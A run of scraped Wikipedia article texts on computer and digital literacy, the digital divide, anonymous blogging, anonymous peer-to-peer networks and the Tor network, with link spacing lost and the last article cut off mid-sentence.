determined by theWorld Economic Forum, revealed that theOECDcountries were not as computer literate as one would expect. About a quarter of individuals did not know how to use a computer. At least 45% were rated poorly, and only 30% were rated as moderately to strongly computer literate.[38] Computers Initiatives
https://en.wikipedia.org/wiki/Computer_literacy
Digital literacyis an individual's ability to find, evaluate, and communicate information using typing ordigital mediaplatforms. Digital literacy combines technical and cognitive abilities; it consists of using information and communication technologies to create, evaluate, and share information,[1]or critically examining the social and political impacts of information and communication technologies[2] Digital literacy initially focused on digital skills and stand-alone computers, but the advent of the internet andsocial mediause has shifted some of its focus tomobile devices.[3] Research into digital literacies draws from traditions ofinformation literacyand research intomedia literacywhich rely on socio-cognitive traditions, as well as research into multimodal composition, which relies on anthropological methodologies.[4]Digital literacy is built on the expanding role of social science research in the field of literacy[5]as well as on concepts ofvisual literacy,[6]computer literacy,[7]andinformation literacy.[8] The concept of digital literacy has evolved throughout the 20th and into the 21st centuries from a technical definition of skills and competencies to a broader comprehension of interacting with digital technologies.[9] Digital literacy is often discussed in the context of its precursor,media literacy. Media literacy education began in the United Kingdom and the United States due to war propaganda in the 1930s and the rise of advertising in the 1960s, respectively.[10]Manipulative messaging and the increase in various forms of media further concerned educators. Educators began to promote media literacy education to teach individuals how to judge and assess the media messages they were receiving. The ability to critique digital and media content allows individuals to identify biases and evaluate messages independently.[10]Both digital and media literacy include the ability to examine and comprehend the meaning of messages, judge credibility, and assess the quality of a digital work.[11] With the rise of file sharing on services such asNapsteran ethics element began to get included in definitions of digital literacy.[12]Frameworks for digital literacy began to include goals and objectives such as critically examining the political dimensions and power dynamics embedded in processes ofdigitizationordatafication;[13]as well as understanding the importance of becoming a socially responsible member of their community by spreading awareness and helping others find digital solutions at home, work, or on a national platform.[11] Digital literacy may also include the production of multimodal texts.[14]This definition refers more to reading and writing on a digital device but includes the use of any modes across multiple mediums that stressSemioticmeaning beyondgraphemes.[15]It also involves knowledge of producing other types of media, like recording and uploading video.[15] Overall, digital literacy shares many defining principles with other fields that use modifiers in front of the term "literacy" to define ways of being and domain-specific knowledge or competence. The term has grown in popularity in education and higher education settings and is used in both international and national standards.[16] The pedagogy of digital literacy has begun to move across disciplines.[4]In academia, digital literacy is a part of the computing subject area alongsidecomputer scienceandinformation technology.[17]while some literacy scholars have argued for expanding the framing beyondinformation and communication technologiesand into literacy education overall.[18] Similar to other evolving definitions ofliteracythat recognize the cultural and historical ways of making meaning,[19]digital literacy does not replace traditional methods of interpreting information but rather extends the foundational skills of these traditional literacies.[20]Digital literacy should be considered a part of the path towards acquiring knowledge.[21] The current model of digital literacy explores six skills listed below.[22] Digital literacy skills continue to develop with the rapid advancements ofartificial intelligence(AI) technologies in the 21st century. AI technologies are designed to simulate human intelligence through the use of complex systems such as machine learning algorithms, natural language processing, and robotics.[24] As these technologies emerge, so have different attempts at definingAI literacy- the ability to understand the basic techniques and concepts behind AI in different products and services.[25]Many framings leverage existing digital literacy frameworks and apply an AI lens to the skills and competencies. Common elements of these frameworks include: Digital literacy is necessary for the correct use of various digital platforms. Literacy insocial network servicesandWeb 2.0sites help people stay in contact with others, pass timely information, and even buy and sellgoods and services. Digital literacy can also prevent people from being taken advantage of online, asphoto manipulation,e-mail fraudsandphishingoften can fool the digitally illiterate, costing victims money and making them vulnerable toidentity theft.[30]However, those using technology and the internet to commit these manipulations and fraudulent acts possess the digital literacy abilities to fool victims by understanding the technical trends and consistencies; it becomes important to be digitally literate to always think one step ahead when utilizing the digital world. The emergence ofsocial mediahas paved the way for people to communicate and connect with one another in new and different ways.[31]Websites likeFacebookandTwitter(now X), as well as personal websites andblogs, have enabled a new type of journalism that is subjective, personal, and "represents a global conversation that is connected through its community of readers."[32]These online communities foster group interactivity among the digitally literate. Social media also help users establish adigital identityor a "symbolic digital representation of identity attributes."[33]Without digital literacy or the assistance of someone who is digitally literate, one cannot possess a personal digital identity (this is closely allied to web literacy). Research has demonstrated that the differences in the level of digital literacy depend mainly on age and education level, while the influence of gender is decreasing.[34][35][36]Among young people, digital literacy is high in its operational dimension. Young people rapidly move through hypertext and have a familiarity with different kinds of online resources. However, for young people, the skills to critically evaluate the content found online show a deficit.[37]With the rise of digital connectivity amongst young people, concerns of digital safety are higher than ever. A study conducted in Poland, commissioned by the Ministry of National Knowledge, measured the digital literacy of parents in regards to digital and online safety. It concluded that parents often overestimate their level of knowledge, but clearly had an influence on their children's attitude and behavior towards the digital world. It suggests that with proper training programs, parents should have the knowledge in teaching their children about the safety precautions necessary to navigate the digital space.[38] Digital divide refers to disparities (such as those living in the developed vs the developing world) concerning access to and the use ofinformation and communication technologies (ICT),[39]such as computer hardware, software, and the Internet, among people.[40]Individuals within societies that lack economic resources to build ICT infrastructure do not have adequate digital literacy, which means that their digital skills are limited.[41]The divide can be explained byMax Weber'ssocial stratification theory, which focuses on access to production, rather than ownership of the capital.[42]Production means having access to ICT so that individuals can interact and produce information or create a product without which they cannot participate in learning, collaboration, and production processes.[42]Digital literacy and digital access have become increasingly important competitive differentiators for individuals using the internet.[43]In the article "The Great Class Wedge and the Internet's Hidden Costs",Jen Schradiediscusses how social class can affect digital literacy.[21]This creates a digital divide. Research published in 2012 found that the digital divide, as defined by access to information technology, does not exist amongst youth in the United States.[44]Young people report being connected to the internet at rates of 94–98%.[44]There remains, however, acivic opportunity gap, where youth from poorer families and those attending lower socioeconomic status schools are less likely to have opportunities to apply their digital literacy.[45]The digital divide is also defined as emphasizing the distinction between the "haves" and "have-nots", and presents all data separately for rural, urban, and central-city categories.[46]Also, existing research on the digital divide reveals the existence of personal categorical inequalities between young and old people.[47]An additional interpretation identified the gap between technology accessed by youth outside and inside the classroom.[48] Media theoristHenry Jenkinscoined the term participation gap[49]and distinguished the participation gap from the digital divide.[10]According to Jenkins, in countries like the United States, where nearly everyone has access to the internet, the concept of the digital divide does not provide enough insight. As such, Jenkins uses the term participation gap to develop a more nuanced view of access to the internet. Instead of referring to the "haves" vs "have-nots" when referring to digital technologies, Jenkins proposes the participation gap refers to people who have sustained access to and competency with digital technologies due tomedia convergence.[50]Jenkins states that students learn different sets of technology skills if they only have access to the internet in a library or school.[51]In particular, Jenkins observes that students who have access to the internet at home have more opportunities to develop their skills and have fewer limitations, such as computer time limits and website filters commonly used in libraries.[51]The participation gap is geared toward millennials. As of 2008, when this study was created, they were the oldest generation to be born in the age of technology. As of 2008, more technology has been integrated into the classroom. The issue with digital literacy is that students have access to the internet at home, which is equivalent to what they interact with in class. Some students only have access while at school and in a library. They aren't getting enough or the same quality of the digital experience. This creates the participation gap, along with an inability to understand digital literacy.[52] Digital rightsare an individual's rights that allow them freedom of expression and opinion in an online setting, with roots centered on human theoretical and practical rights. It encompasses the individual's privacy rights when using the Internet,[53]and is essentially concerned with how an individual uses different technologies and how content is distributed and mediated.[54]Government officials and policymakers use digital rights as a springboard for enacting and developing policies and laws to obtain rights online in the same way that we obtain rights in real life. Private organizations that possess their online infrastructures also develop rights specific to their property.[55]In today's world, most, if not all materials have shifted into an online setting and public policy has had a major influence in supporting this movement.[56]Going beyond traditional academics, ethical rights such ascopyright, citizenship and conversation can be applied to digital literacy because tools and materials nowadays can be easily copied, borrowed, stolen, and repurposed, as literacy is collaborative and interactive, especially in a networked world.[57] Digital citizenshiprefers to the "right to participate in society online". It is connected to the notion of state-based citizenship, which is determined by the country or region in which one was born, and concerns being a dutiful citizen who participates in the electoral process and online through mass media.[55]A literate digital citizen possesses the skills to read, write and interact with online communities via screens and has an orientation towards social justice. This is best described in the article,Digital Citizenship during a Global Pandemic: Moving beyond Digital Digital Literacy,"Critical digital civic literacy, as is the case of democratic citizenship more generally, requires moving from learning about citizenship to participating and engaging in democratic communities face‐to‐face, online, and in all the spaces in between."[58]Through the various digital skills and literacy one gains, one is able to effectively solve social problems that might arise through social platforms. Additionally, digital citizenship has three online dimensions: higher wages, democratic participation, and better communication opportunities that arise from the digital skills acquired.[59]Digital citizenship also refers to online awareness and the ability to be safe and responsible online. This idea came from the rise of social media in the past decade, which has enhanced global connectivity and faster interaction. The idea of a good 'digital citizen' directly correlates with knowledge of, for example, how react to instances of predatory online behaviors, such as cyberbullying.[60] Marc Prenskyinvented and popularized the termsdigital nativesand digital immigrants. A digital native is an individual born into the digital age who has used and applied digital skills from a young age,[61]whereas 'digital immigrant' refers to an individual who adopts technology later in life. These two groups of people have had different interactions with technology since birth, a generational gap.[62]This directly links to their individual and unique relationship with digital literacy. Digital natives brought the creation of ubiquitous information systems (UIS). These systems include mobile phones, laptop computers and personal digital assistants, as well as digital to cars and buildings (smart cars and smart homes), creating a new unique technological experience. Carr claims that digital immigrants, although they adapt to the same technology as natives, possess a sort of "accent" that prevents them from communicating the way natives do. Research shows that, due to the brain's malleable nature, technology has changed the way today's students read, perceive, and process information.[63]Marc Prensky believes this is a problem, because today's students have a vocabulary and skill set that educators (digital immigrants at the time of his writing), may not fully understand.[61] Statistics and popular representations of the elderly portray them as digital immigrants. For example, in Canada in 2010, it was found that 29% of its citizens were 75 years of age and older; 60% of its citizens between the ages of 65-74 had browsed the internet in the past month.[64]Conversely, internet activity reached almost 100% among its 15 to 24-year-old citizens.[64] However, the concept of a digital native has been contested. According to two studies, it was found that students over the age of 30 were more likely to possess characteristics of a digital native when compared to their younger peers. 58% of the students that participated in the study were over 30 years old.[65]One study conducted by Margaryan, Littlejohn, and Vojt (2011), found that while college students born after 1984 frequently used the internet and other digital technology, they showed restricted use of technologies for educational and socializing purposes.[65]In another study conduced at Hong Kong University, it was found that young students are using technology as a means of consuming entertainment and ready-made content, rather than creating content, or engaging with academic content.[65] Society is trending towards a technology-dependent world.[66]It is now necessary to implement digital technology in education;[66]this often includes havingcomputers in the classroom, the use of educational software to teach curricula, and course materials that are made available to students online. Students are often taught literacy skills such as how to verifycredible sourcesonline,citewebsites, and prevent plagiarism. Google and Wikipedia are frequently used by students "for everyday life research,"[67]and are just two common tools that facilitate modern education. Digital technology has impacted the way materials are taught in the classroom. Digital literacy not only helps students navigate online information but also enhances their ability to critically evaluate, synthesize, and apply digital content in academic and real-world settings.[68]With the use of technology rising in this century, educators are altering traditional forms of teaching to include course material on concepts related to digital literacy.[69] Educators have also turned to social media platforms to communicate and share ideas with one another.[69]Social media and social networks have become a crucial part of the information landscape. Social media allows educators to communicate and collaborate with one another without having to use traditional educational tools.[71]Restrictions such as time and location can be overcome with the use of social media-based education.[71] New models of learning are being developed with digital literacy in mind. Several countries have developed their models to emphasize ways of finding and implementing new digital didactics, finding more opportunities and trends via surveys of educators and college instructors.[72]Additionally, these new models of learning in the classroom have aided in promoting global connectivity, enabling students to become globally-minded citizens. According to one study by Stacy Delacruz,Virtual Field Trips, (VFT), a new form of multimedia presentation has gained popularity over the years because they offer the "opportunity for students to visit other places, talk to experts and participate in interactive learning activities without leaving the classroom". They have been used as a vessel for supporting cross-cultural collaboration amongst schools, including: "improved language skills, greater classroom engagement, deeper understandings of issues from multiple perspectives, and an increased sensitivity to multicultural differences". They also allow students to be the creators of their own digital content, a core standard from The International Society for Technology in Education (ISTE).[73] TheCOVID-19 pandemicpushed education into a more digital and online experience where teachers had to adapt to new levels of digital competency in software to continue the education system.[74]As academic institutions discontinued in-person activity,[75]different online meeting platforms were utilized for communication.[75]An estimated 84% of the global student body was affected by this sudden closure due to the pandemic.[76]Because of this, there was a clear disparity in student and school preparedness for digital education due, in large part, to a divide in digital skills and literacy that both the students and educators experienced.[77]For example, countries like Croatia had already begun work on digitalizing its schools countrywide. In a pilot initiative, 920 instructors and over 6,000 pupils from 151 schools received computers, tablets, and presentation equipment, as well as improved connection and teacher training, so that when the pandemic struck, pilot schools were ready to begin offering online programs within two days.[78] The switch to online learning has brought about some concerns regarding learning effectiveness, exposure to cyber risks, and lack of socialization. These prompted the need to implement changes in how students can learn much-needed digital skills and develop digital literacy.[76]As a response, the DQ (Digital Intelligence) Institute designed a common framework for enhancing digital literacy, digital skills, and digital readiness.[79]Attention and focus was also brought to the development of digital literacy in higher education. A study in Spain measured the digital knowledge of 4883 teachers of all education levels over recent school years and found that they needed further training to advance new learning models for the digital age. These programs were proposed using the joint framework. INTEF (National Institute of Educational Technologies and Teacher Training), as a reference.[74] In Europe, the Digital Competence of Educators (DigCompEdu), developed a framework to address and promote the development of digital literacy. It is divided into six branches: professional engagement, digital sources resources, teaching and learning, assessment, empowerment of learners, and the facilitation of learners' digital competence.[80]TheEuropean Commissionalso developed the "Digital Education Action Plan", which focuses on using the COVID-19 pandemic experience to learn how technology is being used on a large scale for education and adapting the systems used for learning and training in the digital age. The framework is divided into two main strategic priorities: fostering the development of a high-performing digital education ecosystem and enhancing digital skills and competencies for digital transformation.[81] In 2013 the Open Universiteit Nederland released an article defining twelve digital competence areas. These areas are based on the knowledge and skills people have to acquire to be digitally literate.[82] The competencies mentioned are based on each other. Competencies A, B, and C are the basic knowledge and skills a person has to have to be a fully digitally literate person. When these three competencies are acquired you can build upon this knowledge and those skills to acquire the other competencies. University of Southern Mississippi professor, Dr. Suzanne Mckee-Waddell[83]conceptualized the idea of digital composition as: the ability to integrate multiple forms of communication technologies and research to create a better understanding of a topic.[vague]Digital writing is a pedagogy that is being taught increasingly in universities. It is focused on the impact technology has had on various writing environments; it is not simply the process of using a computer to write. Educators in favor of digital writing argue that it is necessary because "technology fundamentally changes how writing is produced, delivered, and received."[84]The goal of teaching digital writing is that students will increase their ability to produce a relevant, high-quality product, instead of just a standard academic paper.[85] One aspect of digital writing is the use ofhypertextorLaTeX.[86]As opposed to printed text, hypertext invites readers to explore information in a non-linear fashion. Hypertext consists of traditional text andhyperlinksthat send readers to other texts. These links may refer to related terms or concepts (such is the case onWikipedia), or they may enable readers to choose the order in which they read. The process of digital writing requires the composer to make unique "decisions regarding linking and omission." These decisions "give rise to questions about the author's responsibilities to the [text] and objectivity."[87] The US2014 Workforce Innovation and Opportunity Act (WIOA)defines digital literacy skills as a workforce preparation activity.[88]In the modern world employees are expected to be digitally literate, having full digital competence.[89]Those who are digitally literate are more likely to be economically secure,[90]as many jobs require a working knowledge of computers and the Internet to perform basic tasks. Additionally, digital technologies such as mobile devices, production suites, and collaboration platforms are ubiquitous in most office workplaces and are often crucial in daily tasks, since manyWhite collarjobs today are performed primarily using digital devices and technology.[91]Many of these jobs require proof of digital literacy to be hired or promoted. Sometimes companies will administer their tests to employees, or official certification will be required. A study on the role of digital literacy in the EU labour market found that individuals were more likely to be employed the more digitally literate they were.[92] As technology has become cheaper and more readily available, moreblue-collarjobs have required digital literacy as well. Manufacturers and retailers, for example, are expected to collect and analyze data about productivity and market trends to stay competitive. Construction workers often use computers to increase employee safety.[90]In this context, it is essential for executives to "digital upskill" their employees. Only with efficient training programs and a general willingness among the workforce can technological solutions be used to their full potential.[93] The acquisition of digital literacy is also important when it comes to starting and growing new ventures. The emergence of the World Wide Web and other digital platforms has led to a plethora of new digital products or services[94]that can be bought and sold. Entrepreneurs are at the forefront of this development, using digital tools or infrastructure[95]to deliver physical products, digital artifacts,[96]or internet-enabled service innovations.[97]Research has shown that digital literacy for entrepreneurs consists of four levels (basic usage, application, development, and transformation) and three dimensions (cognitive, social, and technical).[98]At the lowest level, entrepreneurs need to be able to use access devices as well as basic communication technologies to balance safety and information needs. As they move to higher levels of digital literacy, entrepreneurs will be able to master and manipulate more complex digital technologies and tools, enhancing the absorptive capacities and innovative capability of their venture. In a similar vein, if small to medium enterprises, (SMEs), possess the ability to adapt to dynamic shifts in technology, then they can take advantage of trends, marketing campaigns, and communication with consumers to generate more demand for their goods and services. Moreover, if entrepreneurs are digitally literate, then online platforms like social media can further help businesses receive feedback and generate community engagement that could potentially boost their business's performance as well as their brand image. A research paper published inThe Journal of Asian Finance, Economics, and Businessprovides critical insight that suggests digital literacy has the greatest influence on the performance of SME entrepreneurs. The authors suggest their findings can help craft performance development strategies for SME entrepreneurs, arguing that their research shows the essential contribution of digital literacy in developing business and marketing networks.[99]Additionally, the study found that digitally literate entrepreneurs can communicate and reach wider markets than non-digitally literate entrepreneurs because of the use of web-management and e-commerce platforms that were supported by data analysis and coding. That said, constraints do exist for SMEs using e-commerce, including a lack of technical understanding of information technologies, and the high cost of internet access (especially for those in rural/underdeveloped areas).[100] TheUnited Nationsincluded digital literacy in itsSustainable Development Goalsfor 2030, under thematic indicator 4.4.2, which encourages the development of digital literacy proficiency in teens and adults to facilitate educational and professional opportunities and growth.[101]International initiatives like the Global Digital Literacy Council (GDLC) and the Coalition for Digital Intelligence (CDI) have also highlighted the need for digital literacy, and strategies to address this on a global scale.[102][103]The CDI, under the umbrella of the DQ Institute, created the Common Framework for Digital Literacy, Skills, and Readiness in 2019, that conceptualizes eight areas of digital life; identity, use, safety, security,emotional intelligence, communication, literacy, and rights; three levels of maturity: citizenship, creativity, and competitiveness; and three components of competency: knowledge, attitudes and values, and skills.[104]TheUNESCOInstitute for Statistics (UIS)also works to create, gather, map, and assess common frameworks on digital literacy across multiple member-states around the world.[105][106] In an attempt to narrow the Digital Divide, on September 26, 2018, the United StatesSenate Foreign Relations Committeepassed legislation to help provide access to the internet in developing countries via the H.R.600 Digital Global Access Policy Act. The legislation itself was based on SenatorEd Markey's Digital Age Act, which was first introduced to the senate in 2016. In addition, Senator Markey provided a statement after the act was passed through the Senate: "American ingenuity created the internet and American leadership should help bring its power to the developing world," said Senator Markey. "Bridging the global digital divide can help promote prosperity, strengthen democracy, expand educational opportunity and lift some of the world’s poorest and most vulnerable out of poverty. The Digital GAP Act is a passport to the 21st-century digital economy, linking the people of the developing world to the most successful communications and commerce tool in history. I look forward to working with my colleagues to get this legislation signed into law and to harness the power of the internet to help the developing world."[107] ThePhilippines'Education SecretaryJesli Lapushas emphasized the importance of digital literacy in Filipino education. He claims a resistance to change is the main obstacle to improving the nation's education in theglobalizedworld. In 2008, Lapus was inducted into Certiport's "Champions of Digital Literacy" Hall of Fame for his work emphasizing digital literacy.[108] A 2011 study by the Southern African Linguistics & Applied Language Studies program did an observation of some South African university students regarding digital literacy.[109]While their courses did require some sort of digital literacy, very few students actually had access to a computer. Many had to pay others to type any work, as their digital literacy was almost nonexistent. Findings show that class, ignorance, and inexperience still affect access to learning that South African university students may need.[109]
https://en.wikipedia.org/wiki/Digital_literacy
Ananonymous blogis ablogwithout any acknowledged author or contributor. Anonymous bloggers may achieveanonymitythrough the simple use of apseudonym, or through more sophisticated techniques such aslayered encryption routing, manipulation of post dates, or posting only from publicly accessible computers.[1]Motivations for posting anonymously include a desire for privacy or fear of retribution by an employer (e.g., inwhistleblowercases), a government (in countries that monitor or censor online communication), or another group. Fundamentally, deanonymization can be divided into two categories: These techniques may be used together. The order of techniques employed typically escalates from the social correlation techniques, which do not require the compliance of any outside authorities (e.g., Internet providers, server providers, etc.), to more technical identification. Just as a blog can be on any subject, so can an anonymous blog. Most fall into the following major categories: Recently, anonymous blogging has moved into a more aggressive and active style, with organized crime groups such asthe Mafiausing anonymous blogs against mayors and local administrators inItaly.[17] AnIP addressis a unique numerical label assigned to a computer connected to acomputer networkthat uses theInternet Protocolfor communication.[18]The most popular implementation of the Internet Protocol would be theInternet(capitalized, to differentiate it from smallerinternetworks). Internet Service Providers (ISPs) are allocated chunks of IP addresses by aRegional Internet registry, which they then assign to customers. However, ISPs do not have enough addresses to give the customers their own address. Instead,DHCPis used; a customer's device (typically a modem or router) is assigned an IP address from a pool of available addresses. It keeps that address for a certain amount of time (e.g., two weeks). If the device is still active at the end of the lease, it can renew its connection and keep the same IP address. Otherwise, the IP address is collected and added to the pool to be redistributed. Thus, IP addresses provide regional information (through Regional Internet registries) and, if the ISP has logs, specific customer information. While this does not prove that a specific person was the originator of a blog post (it could have been someone else using that customer's Internet, after all), it provides powerful circumstantial evidence. Character frequency analysis takes advantage of the fact that all individuals have a different vocabulary: if there is a large body of data that can be tied to an individual (for example, a public figure with an official blog), statistical analysis can be applied to both this body of data and an anonymous blog to see how similar they are. In this way, anonymous bloggers can tentatively be deanonymized.[19]This is known asstylometry;adversarial stylometryis the study of techniques for resisting such stylistic identification.
https://en.wikipedia.org/wiki/Anonymous_blogging
Ananonymous P2Pcommunication system is apeer-to-peerdistributed applicationin which thenodes, which are used to share resources, or participants areanonymousorpseudonymous.[1]Anonymity of participants is usually achieved by special routingoverlay networksthat hide the physical location of each node from other participants.[2] Interest in anonymous P2P systems has increased in recent years for many reasons, ranging from the desire to share files without revealing one's network identity and riskinglitigation[3]to distrust in governments, concerns overmass surveillanceanddata retention, andlawsuitsagainstbloggers.[4] There are many reasons to use anonymous P2P technology; most of them are generic to all forms of online anonymity. P2P users who desire anonymity usually do so as they do not wish to be identified as a publisher (sender), or reader (receiver), of information. Common reasons include: A particularly open view on legal and illegal content is given inThe Philosophy Behind Freenet. Governments are also interested in anonymous P2P technology. TheUnited States Navyfunded the originalonion routingresearch that led to the development of theTornetwork, which was later funded by theElectronic Frontier Foundationand is now developed by the non-profit organization The Tor Project, Inc. While anonymous P2P systems may support the protection of unpopular speech, they may also protect illegal activities, such asfraud,libel, the exchange of illegalpornography, the unauthorized copying ofcopyrightedworks, or the planning of criminal activities. Critics of anonymous P2P systems hold that these disadvantages outweigh the advantages offered by such systems, and that other communication channels are already sufficient for unpopular speech. Proponents of anonymous P2P systems believe that all restrictions on free speech serve authoritarian interests, information itself is ethically neutral, and that it is the people acting upon the information that can be good or evil. Perceptions of good and evil can also change (seemoral panic); for example, if anonymous peer-to-peer networks had existed in the 1950s or 1960s, they might have been targeted for carrying information aboutcivil rightsoranarchism. Easily accessible anonymous P2P networks are seen by some as a democratization ofencryptiontechnology, giving the general populace access to secure communications channels already used by governments. Supporters of this view, such asPhil Zimmermann, argue that anti-surveillance technologies help to equalize power between governments and their people,[5]which is the actual reason for banning them.John Pilgeropines that monitoring of the populace helps to contain threats to the "consensual view of established authority"[6]or threats to the continuity of power structures and privilege. Some claim that truefreedom of speech, especially on controversial subjects, is difficult or impossible unless individuals can speak anonymously. If anonymity is not possible, one could be subjected to threats or reprisals for voicing an unpopular view. This is one reason why voting is done by secretballotin many democracies. Controversial information which a party wants to keep hidden, such as details about corruption issues, is often published or leaked anonymously. Anonymous bloggingis one widespread use of anonymous networks. While anonymous blogging is possible on the non-anonymous internet to some degree too, a provider hosting the blog in question might be forced to disclose the blogger'sIP address(as when Google revealed an anonymous blogger's identity[7]). Anonymous networks provide a better degree of anonymity. Flogs (anonymous blogs) in Freenet,Syndieand other blogging tools inI2PandOsiris spsare some examples of anonymous blogging technologies. One argument for anonymous blogging is a delicate nature of work situation. Sometimes a blogger writing under their real name faces a choice between either staying silent or causing a harm to themselves, their colleagues or the company they work for.[8] Another reason is risk of lawsuits. Some bloggers have faced multimillion-dollar lawsuits[9](although they were later dropped completely[10]); anonymous blogging provides protection against such risks. On the non-anonymous Internet, adomain namelike "example.com" is a key to accessing information. The censorship of the Wikileaks website shows that domain names are extremely vulnerable to censorship.[citation needed]Some domain registrars have suspended customers' domain names even in the absence of a court order.[citation needed] For the affected customer, blocking of a domain name is a far bigger problem than a registrar refusing to provide a service; typically, the registrar keeps full control of the domain names in question. In the case of a European travel agency, more than 80 .com websites were shut down without any court process and held by the registrar since then. The travel agency had to rebuild the sites under the .nettop-level domaininstead.[11] On the other hand, anonymous networks do not rely ondomain name registrars. For example, Freenet,I2Pand Tor hidden services implement censorship-resistant URLs based onpublic-key cryptography: only a person having the correct private key can update the URL or take it down. Anonymous P2P also has value in normal daily communication. When communication is anonymous, the decision to reveal the identities of the communicating parties is left up to the parties involved and is not available to a third party. Often there is no need or desire by the communicating parties to reveal their identities. As a matter of personal freedom, many people do not want processes in place by default which supply unnecessary data. In some cases, such data could be compiled into histories of their activities. For example, most current phone systems transmit caller ID information by default to the called party (although this can be disabled either for a single call or for all calls). If a person calls to make an inquiry about a product or the time of a movie, the party called has a record of the calling phone number, and may be able to obtain the name, address and other information about the caller. This information is not available about someone who walks into a store and makes a similar inquiry. Online surveillance, such as recording and retaining details of web and e-mail traffic, may have effects on lawful activities.[12]People may be deterred from accessing or communicating legal information because they know of possible surveillance and believe that such communication may be seen as suspicious. According to law professorDaniel J. Solove, such effects "harm society because, among other things, they reduce the range of viewpoints being expressed and the degree of freedom with which to engage in political activity."[13] Most countries ban or censor the publication of certainbooksandmovies, and certain types of content. Other material is legal to possess but not to distribute; for example, copyright andsoftware patentlaws may forbid its distribution. These laws are difficult or impossible to enforce in anonymous P2P networks. Withanonymous money, it becomes possible to arrange anonymous markets where one can buy and sell just about anything anonymously. Anonymous money could be used to avoidtaxcollection. However, any transfer of physical goods between two parties could compromise anonymity.[14] Proponents argue that conventionalcashprovides a similar kind of anonymity, and that existing laws are adequate to combat crimes liketax evasionthat might result from the use of anonymous cash, whether online or offline.[15] Some of the networks commonly referred to as "anonymous P2P" are truly anonymous, in the sense that network nodes carry no identifiers. Others are actually pseudonymous: instead of being identified by their IP addresses, nodes are identified by pseudonyms such as cryptographic keys. For example, each node in theMUTEnetwork has an overlay address that is derived from its public key. This overlay address functions as a pseudonym for the node, allowing messages to be addressed to it. In Freenet, on the other hand, messages are routed using keys that identify specific pieces of data rather than specific nodes; the nodes themselves are anonymous. The termanonymousis used to describe both kinds of network because it is difficult—if not impossible—to determine whether a node that sends a message originated the message or is simply forwarding it on behalf of another node. Every node in an anonymous P2P network acts as a universal sender anduniversal receiverto maintain anonymity. If a node was only a receiver and did not send, then neighbouring nodes would know that the information it was requesting was for itself only, removing anyplausible deniabilitythat it was the recipient (and consumer) of the information. Thus, in order to remain anonymous, nodes must ferry information for others on the network. Originally, anonymous networks were operated by small and friendly communities of developers. As interest in anonymous P2P increased and the user base grew, malicious users inevitably appeared and tried different attacks. This is similar to the Internet, where widespread use has been followed by waves ofspamand distributed DoS (Denial of Service) attacks. Such attacks may require different solutions in anonymous networks. For example, blacklisting of originator network addresses does not work because anonymous networks conceal this information. These networks are more vulnerable to DoS attacks as well due to the smaller bandwidth, as has been shown in examples on the Tor network. A conspiracy to attack an anonymous network could be considered criminal computer hacking, though the nature of the network makes this impossible to prosecute without compromising the anonymity of data in the network. Like conventional P2P networks, anonymous P2P networks can implement either opennet ordarknet(often named friend-to-friend) network type. This describes how a node on the network selects peer nodes: Some networks like Freenet support both network types simultaneously (a node can have some manually added darknet peer nodes and some automatically selected opennet peers) . In a friend-to-friend (or F2F) network, users only make direct connections with people they know. Many F2F networks support indirect anonymous or pseudonymous communication between users who do not know or trust one another. For example, a node in a friend-to-friend overlay can automatically forward a file (or a request for a file) anonymously between two "friends", without telling either of them the other's name or IP address. These "friends" can in turn forward the same file (or request) to their own "friends", and so on. Users in a friend-to-friend network cannot find out who else is participating beyond their own circle of friends, so F2F networks can grow in size without compromising their users' anonymity. Some friend-to-friend networks allow the user to control what kind of files can be exchanged with "friends" within the node, in order to stop them from exchanging files that user disapproves of. Advantages and disadvantages of opennet compared to darknet are disputed, see friend-to-friend article for summary. Private P2Pnetworks are P2P networks that only allow some mutually trusted computers to share files. This can be achieved by using a central server orhubto authenticate clients, in which case the functionality is similar to a privateFTPserver, but with files transferred directly between the clients. Alternatively, users can exchange passwords or keys with their friends to form a decentralized network. Examples include: Friend-to-friendnetworks are P2P networks that allows users only to make direct connections with people they know. Passwords or digital signatures can be used for authentication. Examples include : The following networks only exist as design or are in development It is possible to implement anonymous P2P on awireless mesh network; unlike fixed Internet connections, users don't need to sign up with an ISP to participate in such a network, and are only identifiable through their hardware. Protocols forwireless mesh networksareOptimized Link State Routing Protocol(OLSR) and the follow-up protocolB.A.T.M.A.N., which is designed for decentralized auto-IP assignment. See alsoNetsukuku. Even if a government were to outlaw the use of wireless P2P software, it would be difficult to enforce such a ban without a considerable infringement of personal freedoms. Alternatively, the government could outlaw the purchase of the wireless hardware itself.
https://en.wikipedia.org/wiki/Anonymous_P2P
Tor[6]is a freeoverlay networkfor enablinganonymous communication. Built onfree and open-source softwareand more than seven thousand volunteer-operated relays worldwide, users can have theirInternet trafficrouted via a random path through the network.[7][8] Using Tor makes it more difficult to trace a user'sInternetactivity by preventing any single point on the Internet (other than the user's device) from being able to view both where traffic originated from and where it is ultimately going to at the same time.[9]This conceals a user's location and usage from anyone performingnetwork surveillanceortraffic analysisfrom any such point, protecting the user's freedom and ability to communicate confidentially.[10] The core principle of Tor, known asonion routing, was developed in the mid-1990s byUnited States Naval Research Laboratoryemployees,mathematicianPaul Syverson, andcomputer scientistsMichael G. Reed and David Goldschlag, to protectAmerican intelligencecommunications online.[11]Onion routing is implemented by means ofencryptionin theapplication layerof thecommunication protocolstack, nested like the layers of anonion. Thealpha versionof Tor, developed by Syverson and computer scientistsRoger DingledineandNick Mathewsonand then called The Onion Routing project (which was later given the acronym "Tor"), was launched on 20 September 2002.[12][13]The first public release occurred a year later.[14] In 2004, the Naval Research Laboratory released the code for Tor under a free license, and theElectronic Frontier Foundation(EFF) began funding Dingledine and Mathewson to continue its development.[12]In 2006, Dingledine, Mathewson, and five others foundedThe Tor Project, aMassachusetts-based501(c)(3)research-educationnonprofit organizationresponsible for maintaining Tor. The EFF acted as The Tor Project'sfiscal sponsorin its early years, and early financial supporters included the U.S.Bureau of Democracy, Human Rights, and LaborandInternational Broadcasting Bureau,Internews,Human Rights Watch, theUniversity of Cambridge,Google, and Netherlands-basedStichting NLnet.[15][16] Over the course of its existence, variousTor vulnerabilitieshave been discovered and occasionally exploited. Attacks against Tor are an active area of academic research[17][18]that is welcomed by The Tor Project itself.[19] Tor enables its users to surf the Internet, chat and send instant messagesanonymously, and is used by a wide variety of people for bothlicitand illicit purposes.[22]Tor has, for example, been used by criminal enterprises,hacktivismgroups, and law enforcement agencies at cross purposes, sometimes simultaneously;[23][24]likewise, agencies within the U.S. government variously fund Tor (theU.S. State Department, the National Science Foundation, and – through the Broadcasting Board of Governors, which itself partially funded Tor until October 2012 –Radio Free Asia) and seek 